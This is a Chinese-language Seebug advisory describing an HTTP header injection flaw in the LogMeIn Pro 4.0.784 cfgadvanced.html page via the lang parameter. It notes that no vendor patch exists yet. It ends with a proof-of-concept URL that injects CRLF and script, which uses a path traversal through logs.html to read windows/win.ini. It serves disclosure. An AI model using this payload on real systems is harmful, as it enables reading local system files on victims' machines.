LogMeIn cfgadvanced.html页面HTTP头注入漏洞

2009-06-09T00:00:00
ID SSV:11547
Type seebug
Reporter Root
Modified 2009-06-09T00:00:00

Description

BUGTRAQ ID: 35236

LogMeIn是流行的远程访问软件,允许通过网络控制计算机。

LogMeIn的cfgadvanced.html页面存在HTTP头注入漏洞。如果用户受骗跟随了恶意链接并收到了lang参数,LogMeIn会将 lang参数值储存在[HKEY_LOCAL_MACHINE\SOFTWARE\LogMeIn\V5\Appearance\Language]注册表中,并在每次点击链接的时候在Content-Language头中使用,因此特制参数可能导致注入并执行任意代码。

LogMeIn Pro 4.0.784 厂商补丁:

LogMeIn, Inc.

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href="https://secure.logmein.com/home.asp?lang=en" target="_blank" rel=external nofollow>https://secure.logmein.com/home.asp?lang=en</a>

                                        
                                            
                                                https://localhost:2002/cfgadvanced.html?op=update&amp;DisconnectExisting=1&amp;NoHttpCompr=1&amp;CrashDumpInfo=0&amp;lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--